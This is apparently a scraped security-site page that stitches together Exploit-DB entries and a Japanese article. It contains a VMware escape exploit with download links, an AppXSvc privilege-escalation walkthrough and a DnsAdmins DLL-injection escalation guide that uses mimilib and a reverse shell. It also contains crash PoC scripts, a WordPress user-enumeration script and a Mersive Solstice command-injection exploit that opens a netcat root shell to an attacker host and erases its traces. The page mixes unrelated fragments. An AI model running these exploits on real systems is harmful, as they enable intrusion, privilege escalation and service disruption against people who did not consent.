HireHackking

# VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.5 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 # Known issues * Failing to heap manipulation causes host process crash. * Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH. # FAQ * Q: Error in reboot vmware after crashing process. * A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.  EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47714.zip

# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation # Date: 2019-11-22 # Exploit Author: Abdelhamid Naceri # Vendor Homepage: www.microsoft.com # Tested on: Windows 10 1903 # CVE : CVE-2019-1385 Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability Class: Local Elevation of Privileges Description: This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability could allow an attacker to overwrite\create file as SYSTEM which can result in EOP . The're is 2 way to abuse the issue . Step To Reproduce : [1] For An Arbitrary File Creation 1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To your target directory example "c:\" 2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe 3-Check the directory the file should be created now 4-Enjoy:) [2] To Overwrite File 1-Create a temp dir in %temp%\ 2-Create a hardlink to your target file in the temp created dir 3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to your temp created dir 4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe 5-Check the file again Limitation : when 'MicrosoftEdge.exe' is created it would inherit the directory permission which mean the file wouldnt be writtable in majority of cases but a simple example of abusement in the directory "c:\" <- the default acl is preventing Athenticated Users from creating file but not modifying them so if we abused the vulnerability in "c:\" we will have an arbitrary file created and also writeable from a normal user . also you cant overwrite file that are not writable by SYSTEM , i didnt make a check in the poc because in if the file is non readable by the current user the check will return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite file which you cant even read them . In the file creation make sure the path is writtable by SYSTEM otherwise the poc will fail . I think 99% of folders are writtable by SYSTEM Platform: This has been tested on a fully patched system (latest patch -> November 2019) : OS Edition: Microsoft Windows 10 Home Os Version: 1903 OS Version Info: 18362.418 Additional Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202 Expected result: The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED" Observed result : The Deployment Process is overwritting or creating an arbitrary file as "LOCAL SYSTEM" NOTE : It was patched on 7/11/19

0x00はじめに 独自のDNSサーバー関数を実装することに加えて、Microsoftは、Active Directoryドメインとの管理統合を促進するために、このサーバー向けの独自の管理プロトコルも実装しています。デフォルトでは、ドメインコントローラーはDNSサーバーでもあります。ほとんどの場合、すべてのドメインユーザーは、DNSサーバーの機能にアクセスして使用する必要があります。これにより、ドメインコントローラーにかなりの攻撃面が公開されます。一方では、DNSプロトコル自体と、RPCに基づいた管理プロトコルです。 DNSプロトコルの実装を掘り下げ、優れたパワーレイズテクニックを詳細に導入します。場合によってはドメインコントローラーで危険なコードを実行することができますが、これはセキュリティの脆弱性ではありませんが、Microsoftが証明したように、REDチームに広告許可エスカレーションを提供できる機能のトリックにすぎません。 公式のMicrosoftドキュメント（[MS-DNSP]、 https://msdn.microsoft.com/en-us/library/cc422504.aspx）関連情報を収集し、IDAを使用してdns.exeのバイナリファイル逆分析を実行します。 0x01 DNSサーバー管理プロトコルの基本知識 DNSサーバーのリモートアクセスと管理の方法を提供するRPCインターフェイスを定義するドメイン名サービス（DNS）サーバー管理プロトコルを指定します。これは、DNSサーバーを構成、管理、監視するためのRPCベースのクライアントおよびサーバープロトコルです。管理プロトコル層はRPCの上にあり、TCPまたは名前付きパイプの上に層状にすることができます。プロトコルまたはその実装原則に興味がある場合は、c: \ windows \ system32 \ dns.exの下のドメインコントローラーで見つけることができます。そのRPCインターフェイスUUID値は50ABC2A4-574D-40B3-9D66-EE4FD5FBA076で、\ pipe \ dnsserverという名前のパイプを使用して送信されます。 DNSサーバーは、ドメインコントローラーで実行されるサービスとして機能します。アクセス管理インターフェイスは、コマンドdnsmgmt.mscを実行してAD DNSサーバー（通常はドメインコントローラー）に接続することで開きます。これにより、ユーザーはDNSゾーン、検索、キャッシュ、フォワード、ロギングなどの情報を構成できます。この構造の複数のオブジェクトには、DNSサーバーオブジェクト（コンピューターアカウントではなく）、ゾーンオブジェクト、およびレコードが含まれるようにすることができます。この場合、DNSサーバーオブジェクトに関心があり、新しくインストールされたルールとポリシーを以下の図に示します。 デフォルトでは、DNSADMINS、ドメイン管理者、エンタープライズ管理者、管理者、およびエンタープライズドメインコントローラーグループのみが、このオブジェクトに権限を記述しています。攻撃者の観点から、私たちがDNSADMINSグループに属さないが、DNSに許可を読み書きできる各グループのメンバーである場合、DNSADMINがある場合にできることを見てみましょう。 0x02 dnsadmins許可の悪用 ・DNS管理はRPC（UUIDは50ABC2A4-574D-40B3-9D66-EE4FD5FBA076）を介して実行され、透過メカニズムは\ pipe \ dnsserverという名前のパイプです。 ・Microsoftプロトコルの仕様によると、選択可能なDLLは「ServerLevelPlugIndll」（検証済みのDLLパスなし）を介してロードできます。 ・DNSCMD.EXEはこの関数を実装しています。 dnscmd.exe /config /serverLevelPlugIndll \\ path \ to \ dll このDNSCMD.EXEコマンドをDNSADMINSメンバーのユーザーとして実行すると、次のレジストリキー値が登録されます。 hkey_local_machine \ system \ currentControlset \ services \ dns \ parameters \ serverLevelPlugIndll ・DNSサービスを再起動すると、このリモートパスにDLLがロードされます。ただし、DLLには「dnspluginitialize、dnsplugincleanup、またはdnspluginqueryエクスポート機能」を含める必要があります。 ・DLLは、ドメインコントローラーのコンピューターアカウントがアクセスできるネットワーク共有ホスト上にある必要があります。 Mimikatzにはカスタマイズ可能なDLL（GitHubのソースコード）が含まれているため、DNSサービスが開始されたときにMimikatz DLLをロードするMimikatz DLLを更新して、攻撃者が読み取りにアクセスできる場所への資格情報のダンプを監視できることに注意してください。 0x03 ファジーテストServerLevelPlugIndllメッセージの処理イベントと照合ルールの処理。基本的に、サーバーがサポートする必要があるすべての操作を説明します。 1つ目はR_DNSSRVOPERATIONです。これには、サーバーが実行する操作を決定するPSZOPERATIONパラメーターが含まれています。スワイプダウンして、次のように、可能なpszoperation値のリストを閲覧します。 サーバーは、選択したDLLのみをロードしていることがわかります。 ServerLevelPlugIndllで手順を検索した後、次の有用な情報を見つけることができます。 サーバーは、この操作で指定されたDLLパスの検証さえ行わないようです。実装を開始する前に、Googleを使用してServerLevelPlugIndll関連情報を検索しますが、情報はありますが、有用なDNSCMDコマンドラインツールがポップアップします。 幸いなことに、DNSCMDは必要なすべてを達成しました。そのヘルプ情報を簡単に見ると、https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmdを参照することもできます。 コマンドオプションは次のとおりです。 dnscmd.exe /config /serverLevelPlugIndll \\ path \ to \ dll まず、これをDNSサーバーオブジェクトに特別な権限なしに通常のドメインユーザーとして実行してみてください（一般的な読み取りは、デフォルトでドメインユーザーグループを含む2000年以前の互換性のあるアクセスグループのすべてのメンバーを付与します）、コマンドはアクセスの拒否情報を実行できず、拒否された情報を表示しませんでした。通常のユーザーにサーバーオブジェクトへの書き込みアクセスを提供すると、コマンドを正常に実行できます。これは、DNSADMINSグループのメンバーがこのコマンドを正常に実行できることを意味します。 DCのメンバーを実行しているドメインマシンでプロセスモニターとプロセスエクスプローラーを実行している間、予想通りDNS.ExeのアドレススペースにDLLがロードされないことがわかります。ただし、次のレジストリキーが送信したパスに書き込まれていることがわかります。 hkey_local_machine \ system \ currentControlset \ services \ dns \ parameters \ serverLevelPlugIndll これで、テストのためにDNSサーバーサービスを再起動しますが、起動できず、レジストリキー値をクリアすると開始できます。明らかに、DLLからより多くのものが必要です。 この場合、私たちが求めている機能に迅速に到達する可能性がいくつかあります ：IDAを通じて関連する文字列を検索し、関連するAPIを検索します。これは通常、最も簡単で最速の方法です。私たちの例：LoadLibraryWまたはGetProcAddressは、LoadLibraryWのDLL関数コードとそれを呼び出す関数を通じて、必要なものを提供します。ServerLevelPlugIndLLを実行するパスには検証がないことがわかります。 私たちが抱えている問題は確かにユニークです。DLLがロードに失敗した場合、またはDNSPluginitialize、DNSPlugincLeanup、またはDNSPluginQueryを含んでいない場合、サービスは開始されません。また、エクスポートがすべて0を返す（値を正常に返す）ことを確認する必要があります。そうしないと、サービスの失敗を引き起こす可能性もあります。 DLLのロードを担当する関数の擬似コードは、ほぼ次のとおりです。 hmodule hlib; if（g_pluginpath * g_pluginpath）{ hlib=loadlibraryw（g_pluginpath）; g_hndplugin=hlib; if（！hlib）{. log and return error .} g_dlldnspluginitialize=getProcAddress（hlib、 "dnspluginitialize"）; if（！g_dlldnspluginitialize）{. log and return error .} g_dlldnspluginquery=getProcAddress（hlib、 "dnspluginquery"） if（！g_dlldnspluginquery）{. log and return error .} g_dlldnsplugincleanup=getProcaddress（hlib、 "dnsplugincleanup"） if（！g_dlldnsplugincleanup）{. log and return error .} if（g_dlldnspluginitialize）{ g_dlldnspluginitialize（pcallback1、pcallback2）; } } このPOCは、Visual Studio 2015でこのようなDLLのコードを表示する方法を示すために使用されます。 コンパイルディスプレイは、デフォルトのエクスポート名を必要な名前に変更するために使用されます。エクスポートが問題ないことを確認するには、パスを使用/エクスポートすることができます\ to \ dll これで、新しいDLLとVoilaでDNSCMDを実行しようとします。それは機能します。DLLがDLLをドメインコントローラーのコンピューターアカウントでアクセスできるネットワークパスに配置することだけです（DNS.Exeはシステムで実行されます）（すべてのSIDにアクセスする必要があります）。 これは、あなたがDNSADMINSのメンバーである場合、DNSを管理するための権限を引き継ぐことができることを示唆していますが、それに限定されません。このヒエラルキーを正常に完了するために必要なのは、DNSサーバーオブジェクトに書き込みアクセスできるアカウントです。私の経験では、これらのオブジェクトのACLは通常、ドメイン管理者のACL（または管理者によって保護されている類似グループ）のように監視されず、目立たない平均ドメインユーザーが特権を強化する絶好の機会を提供します。 公式情報に記載されているように、これはすべての最新のWindows Serverバージョンに適用されるはずです。 MicrosoftのMSRCはすでにこの問題に関する問題を追跡しており、基本的にDC管理者がServerLevelPlugIndllレジストリのキー権限を変更できるようにすることで修正されると述べ、この機能は将来のリリースでオフにすることができます。 とにかく、DNS.Exeは現在、システムとして実行されており、危険な攻撃を受けているため、一部のファッザーにとって有用なエクスプロイトになる可能性があります。 0x04 DNS ADドメイン管理者インスタンスとして特権 DNSADMINSグループのメンバーである、またはDNSサーバーオブジェクトの記述権限を作成しているユーザーが、DNSサーバー上のシステム許可をDLLにロードできます。多くのエンタープライズ設定は、DNSサーバーとしてドメインコントローラー（DCS）も使用しているため、この機能が実際にどのように使用されているかを見てみましょう。 ここでは、検証する実験を設定します。この実験では、通常のドメインユーザー（Labuser）（DNSとADは同じサーバー）を介してADドメインに最初にアクセスします。 PowerViewを使用してDNSADMINSグループに属するユーザー情報を最初に列挙しましょう ps c: \ get -netgroupmember -groupName 'dnsadmins' Real RedチームまたはPentestでは、BuildAdminユーザーを攻撃することです。 PowerViewのInvoke-UserHunterを使用して、BuildAdminを使用してDNSサーバーにアクセスできる認証チケットを見つけることができます。 PS C: \ invoke -userhunter -username buildAdmin（コマンド認証チケットを実行して、ブリダミンユーザーのホストでDNSにアクセスする） BuildAdminのチケットが利用可能で、現在のユーザー（Labuser）にもローカル管理者アクセスがあるこの認証済みのチケットが見つかったと仮定します。したがって、DNSADMINSグループのメンバーであるユーザーに許可があります。 現在、2つの状況があります。1つはDCサーバーとDNSサーバーの両方であり、もう1つはDNSサーバーとして別のサーバーです。 最初のケースでは、DNSサーバーサービスがDCで実行されています。DNSCMDツールを使用してDLLをロードできます。 PowerShellモジュールDNSServerもありますが、詳細な使用記録はありません。 次のコマンドを使用して、DLLをリモートでロードできます。 UNCパス\\ ops-build \ dllは、DCが読み取る必要があります。 PS C: \ DNSCMD OPS_DC /CONFIG /SERVERLEVELPLUGINDLL \\ OPS-BUILD \ DLL \ MIMILIB.DLL（DNSにアクセスし、DNSの権利をエスカレートするために許可を書き込む通常のドメインアカウントを持つユーザー）） デバッグ（ターゲットには管理者の許可が必要）には、次のコマンドを使用して、DLLがターゲットに正常に追加されたかどうかを確認できます。 PS C: \ get-itemproperty 現在、取得したユーザーBuildAdminはDNSADMINSグループに属しているため、DNSサービスを再起動できます。これはデフォルトの構成ではありませんが、そのようなユーザーにはDNSサービスを再起動する権利があります。 C: \ sc \ ops-dc stop dns C: \ sc \ ops-dc start dns では、上記のコマンドを正常に実行した後、何が得られますか？ベンジャミンは、この攻撃のためにミミリブをすぐに更新しました。この攻撃で使用されている更新されたバージョンMimilibは、すべてのDNSクエリをC: \ Windows \ System32 \ kiwidns.logにログに記録します。 KDNS.Cを変更して、リモートコマンド実行機能を含めることができます。 NishangのInvoke-Encodeエンコーディングを使用してPowerShellシェルを難読化するための簡単なコードを含めました。 DNSサービスの各クエリに対してペイロードを実行します。 リスニングサーバー上のリモートサーバー（DC）からバウンスすることができるshell: ドメインコントローラーで取得されたシステム許可を正常に確認できます。 2番目のケースでは、DNSサービスがDCで実行されていない場合でも、ユーザーの「のみ」DNSADMINSアクセス許可を利用し、DNSサービスを再起動してシステムアクセスを取得できます。 攻撃を検出する方法は？攻撃を防ぐために、ポリシーを確認して、DNSサーバーオブジェクトの書き込み許可とDNSADMINSグループのメンバーシップを取得します。 DNSサービスの再起動とログ情報ディスプレイのペア：DNSサーバーログイベントID 150は失敗を意味し、770は成功を意味します Microsoft-Windows-DNS-Server/Audit LogイベントIDが成功し、実行に失敗しました 541 レジストリの監視：\ system \ currentControlset \ Services \ dns \ parameters \ serverLevelPlugIndll値も役立ちます。 0x05 防衛・管理者アカウントのみがDNSADMINSグループのメンバーであることを確認し、管理者のみがシステムDNSを管理する許可を持っていることを確認します。 ・特権アクセスなしのグループ/アカウントのDNSサーバーオブジェクト許可ポリシー設定が正しいかどうかを定期的に確認します。 RPCを管理者アクセスサブネットにDC通信に制限します。 ・DC管理者は、ServerLevelPlugIndllレジストリキーの権限を変更できるようにします。

# VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.3 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 # Known issues * Failing to heap manipulation causes host process crash. (About 50% successful rate ) * Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH. # FAQ * Q: Error in reboot vmware after crashing process. * A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.  # Reference * https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/ EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47715.zip

#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC) #Exploit Author : ZwX #Exploit Date: 2019-11-26 #Vendor Homepage : https://www.microsoft.com/ #Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681 #Tested on OS: Windows 7 Proof of Concept (PoC): ======================= 1.Download and install Microsoft DirectX SDK 2.Open the PIX for Windows tools 2.Run the python operating script that will create a file (poc.PIXrun) 3.Run the software "File -> Open File -> Add the file (.PIXrun) " 4.PIX for Windows Crashed #!/usr/bin/python DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") poc = DoS file = open("poc.PIXrun,"w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2019-11-23 # Vendor Homepage: http://www.indusoft.com/ # Software Link : http://www.indusoft.com/Products-Downloads # Tested Version: 8.1 SP1 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC) # Discovery by: chuyreds # Google Dork: chuyrojas1997@gmail.com: chuyreds # Discovery Date: 23-11-2019 # Vendor Homepage: http://www.indusoft.com/ # Software Link : http://www.indusoft.com/Products-Downloads # Tested Version: 8.1 SP1 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Denial of Service: # 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py # 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard # 3.- Open InduSoft Web Studio Edition 8.1 SP1 # 4.- On Graficos slect Atributos # 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar" #!/usr/bin/env python buffer = "\x41" * 1026 f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w") f.write(buffer) f.close()

# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2019-11-25 # Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975 # Software Link: App Store for iOS devices # Tested Version: 8.20 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 6s iOS 13.2 # Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as # Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan. # Steps to Produce the Crash: # 1.- Run python code: iNetTools.py # 2.- Copy content to clipboard # 3.- Open "iNetTools for iOS" # 4.- Go to "Whois" # 5.- Paste ClipBoard on "Domain Name" # 6.- Start # 7.- Crashed #!/usr/bin/env python buffer = "\x41" * 98 print (buffer)

#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC) #Exploit Author : ZwX #Exploit Date: 2019-11-26 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Tools -> Base64 Encrypted Password 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title : Wordpress 5.3 - User Disclosure # Author: SajjadBnd # Date: 2019-11-17 # Software Link: https://wordpress.org/download/ # version : wp < 5.3 # tested on : Ubunutu 18.04 / python 2.7 # CVE: N/A #!/usr/bin/python # -*- coding: utf-8 -*- # import requests import os import re import json import sys import urllib3 def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def Banner(): print(''' - Wordpress < 5.3 - User Enumeration - SajjadBnd ''') def Desc(): url = raw_input('[!] Url >> ') vuln = url + "/wp-json/wp/v2/users/" while True: try: r = requests.get(vuln,verify=False) content = json.loads(r.text) data(content) except requests.exceptions.MissingSchema: vuln = "http://" + vuln def data(content): for x in content: name = x["name"].encode('UTF-8') print("======================") print("[+] ID : " + str(x["id"])) print("[+] Name : " + name) print("[+] User : " + x["slug"]) sys.exit(1) if __name__ == '__main__': urllib3.disable_warnings() reload(sys) sys.setdefaultencoding('UTF8') clear() Banner() Desc() wpuser.txt #!/usr/bin/python # -*- coding: utf-8 -*- # # Exploit Title : Wordpress < 5.3 - User Disclosure # Exploit Author: SajjadBnd # email : blackwolf@post.com # Software Link: https://wordpress.org/download/ # version : wp < 5.3 # tested on : Ubunutu 18.04 / python 2.7 import requests import os import re import json import sys import urllib3 def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def Banner(): print(''' - Wordpress < 5.3 - User Enumeration - SajjadBnd ''') def Desc(): url = raw_input('[!] Url >> ') vuln = url + "/wp-json/wp/v2/users/" while True: try: r = requests.get(vuln,verify=False) content = json.loads(r.text) data(content) except requests.exceptions.MissingSchema: vuln = "http://" + vuln def data(content): for x in content: name = x["name"].encode('UTF-8') print("======================") print("[+] ID : " + str(x["id"])) print("[+] Name : " + name) print("[+] User : " + x["slug"]) sys.exit(1) if __name__ == '__main__': urllib3.disable_warnings() reload(sys) sys.setdefaultencoding('UTF8') clear() Banner() Desc()

# Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2019-11-27 # Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963 # Software Link: App Store for iOS devices # Tested Version: 1.2 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 6s iOS 13.2.3 # Summary: With GHIA CamIP you can view your cameras in real time supports conventional IPC cameras, # cameras with alarm, Video intercom and other devices. # Steps to Produce the Crash: # 1.- Run python code: GHIA.py # 2.- Copy content to clipboard # 3.- Open "GHIA CamIP for iOS" # 4.- Go to "Add" # 5.- Wireless Settings # 6.- Connect to the internet # 7.- Paste Clipboard on "Password" # 8.- WiFi Connection # 9.- Start setting # 10- Crashed #!/usr/bin/env python buffer = "\x41" * 33 print (buffer)

#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service #Exploit Author : ZwX #Exploit Date: 2019-11-28 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution # Google Dork: N/A # Date: 2016-12-23 # Exploit Author: Alexandre Teyar # Vendor Homepage: https://www2.mersive.com/ # Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk # Versions: 2.8.0 # Tested On: Mersive Solstice 2.8.0 # CVE: CVE-2017-12945 # Description : This will exploit an (authenticated) blind OS command injection # vulnerability present in Solstice devices running versions # of the firmware prior to 2.8.4. # Notes : To get the the command output (in piped-mode), a netcat listener # (e.g. 'nc -lkvp <LPORT>') needs to be launched before # running the exploit. # To get an interactive root shell use the following syntax # 'python.exe .\CVE-2017-12945.py -pass <PASSWORD> # -rh <RHOST> -p "busybox nc <LHOST> <LPORT> # -e /system/bin/sh -i"'. #!/usr/bin/env python3 import argparse import logging import requests import sys import time def parse_args(): """ Parse and validate the command line supplied by users """ parser = argparse.ArgumentParser( description="Solstice Pod Blind Command Injection" ) parser.add_argument( "-d", "--debug", dest="loglevel", help="enable verbose debug mode", required=False, action="store_const", const=logging.DEBUG, default=logging.INFO ) parser.add_argument( "-lh", "--lhost", dest="lhost", help="the listening address", required=False, type=str ) parser.add_argument( "-lp", "--lport", dest="lport", help="the listening port - default 4444", required=False, default="4444", type=str ) parser.add_argument( "-p", "--payload", dest="payload", help="the command to execute", required=True, type=str ) parser.add_argument( "-pass", "--password", dest="password", help="the target administrator password", required=False, default="", type=str ) parser.add_argument( "-rh", "--rhost", dest="rhost", help="the target address", required=True, type=str ) return parser.parse_args() def main(): try: args = parse_args() lhost = args.lhost lport = args.lport password = args.password rhost = args.rhost logging.basicConfig( datefmt="%H:%M:%S", format="%(asctime)s: %(levelname)-8s %(message)s", handlers=[logging.StreamHandler()], level=args.loglevel ) # Redirect stdout and stderr to <FILE> # only when the exploit is launched in piped mode if lhost and lport: payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1" logging.info( "attacker listening address: {}:{}".format(lhost, lport) ) else: payload = args.payload logging.info("solstice pod address: {}".format(rhost)) if password: logging.info( "solstice pod administrator password: {}".format(password) ) # Send the payload to be executed logging.info("sending the payload...") send_payload(rhost, password, payload) # Send the results of the payload execution to the attacker # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE> if lhost and lport: payload = ( "busybox nc {} {} < /data/local/tmp/rce.tmp ".format( lhost, lport ) ) logging.info("retrieving the results...") send_payload(rhost, password, payload) # Erase exploitation traces payload = "rm -f /data/local/tmp/rce.tmp" logging.info("erasing exploitation traces...") send_payload(rhost, password, payload) except KeyboardInterrupt: logging.warning("'CTRL+C' pressed, exiting...") sys.exit(0) def send_payload(rhost, password, payload): URL = "http://{}/Config/service/saveData".format(rhost) headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Referer": "http://{}/Config/config.html".format(rhost) } data = { "m_networkCuration": { "ethernet": { "dhcp": False, "staticIP": "; {}".format(payload), "gateway": "", "prefixLength": 24, "dns1": "", "dns2": "" } }, "password": "{}".format(password) } # Debugging using the BurpSuite # proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'https://127.0.0.1:8080' # } try: logging.info("{}".format(payload)) response = requests.post( URL, headers=headers, # proxies=proxies, json=data ) logging.debug( "{}".format(response.json()) ) # Wait for the command to be executed time.sleep(2) except requests.exceptions.RequestException as ex: logging.error("{}".format(ex)) sys.exit(0) if __name__ == "__main__": main()

In this article, let’s introduce to you the hashcat cracking of WiFi passwords!

# Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path # Date: 2019-11-28 # Exploit Author: Cristian Ayala G # Vendor Homepage: https://tenaxsoft.com/index.html # Software Link: https://tenaxsoft.com/descargas.html # Version: 6.4.131 # Tested on: Windows 10 Pro x64 ########################################################################## # Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\ | findstr """ CCSrvProxy CCSrvProxy C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe Auto Control de impresiones Tenax ControldeImpresiones C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe Auto ########################################################################## # Service info: C:\Users\user>sc qc CCSrvProxy [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: CCSrvProxy TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : CCSrvProxy DEPENDENCIAS : Spooler NOMBRE_INICIO_SERVICIO: LocalSystem ##########################################################################

